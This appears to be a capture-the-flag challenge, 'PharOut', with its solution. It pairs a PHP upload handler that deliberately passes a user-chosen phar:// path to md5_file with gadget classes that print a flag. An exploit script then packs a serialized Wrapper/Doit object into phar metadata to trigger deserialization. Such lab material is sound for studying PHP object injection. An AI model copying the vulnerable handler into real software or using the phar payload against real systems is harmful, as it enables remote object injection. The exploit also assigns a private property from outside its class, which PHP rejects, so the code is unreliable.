PharOut

<?php
if (isset($_POST['submit']) && $_FILES['the_file']['size'] > 0)
{
    $dest_dir = getcwd() . "/uploads/";

    echo "<br />Submitted<br />";
    $target_file = $dest_dir . basename($_FILES["the_file"]["name"]);
    //print_r($_FILES);
    move_uploaded_file($_FILES["the_file"]["tmp_name"], $target_file);

    if ($_POST['s'] === 'p')
        $s = 'phar://';
    else
        $s = 'file://';
    echo md5_file("$s$target_file");
    unlink($target_file);
}
?>

<?php
class Doit {
        public function __construct()
        {
                $flag = getenv("FLAG");
                echo "flag{{$flag}}\n";
        }
}
?>

<?php
include("doit.php");

class Wrapper
{
    private $doit;
    public function __wakeup()
    {
        if (isset($this->doit))
        {
            $this->doit = new Doit();
        }
        else
        {
            echo "Hello from Wrapper!";
        }
    }
}
?>

<?php

namespace Flag {
  include './Project/wrapper.php';

    use Doit;
    use Wrapper;

  $phar = new \Phar("exploit.phar");
  $phar->startBuffering();
  $phar->setStub("<?php __HALT_COMPILER();");

  # Setting the metadata serializes the payload object
  $payload = new Wrapper();
  $payload->doit = new Doit();
  # Here’s where the object is serialized and added to the Phar
  $phar->setMetadata($payload);

  # Add a dummy file to respect the Phar specifications
  $phar->addFromString("test.txt", "test");
  $phar->stopBuffering();
}

php -c php.ini phar_creator.php